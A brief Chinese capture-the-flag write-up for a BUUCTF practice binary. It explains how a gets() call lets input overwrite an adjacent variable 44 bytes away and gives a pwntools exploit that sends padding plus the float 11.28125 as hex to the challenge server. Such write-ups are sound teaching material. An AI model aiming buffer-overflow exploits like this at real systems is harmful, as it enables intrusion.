1.下载文件,用checksec一下:
2.用IDA64查看,进入func函数:
当v2=11.28125时获得flag,但只有v1的输入,没有v2输入。因为有一个gets函数,点击v1,v2可以知道,v1与v2差44个字节,可以通过输入v1的值去改变v2的值,实现栈溢出。
查看汇编可以看到有一个uconiss的比较指令,把xmm0与cs:dword_4007F4,由movss可以知道xmme0是v1或v2的值,那么点击dword_4007F4
看到一个 dd ,百度一下可以知道,是一个赋值的指令,因为是把v2和11.28125比较,那么可以知道dd后面的可能是11.28125的16进制。
编写exp:
from pwn import *
r=remote('node4.buuoj.cn',27635)
#r=process('./ciscn')
payload=b"A"*44+p64(0x41348000)
r.sendline(payload)
r.interactive()
运行exp,得到flag: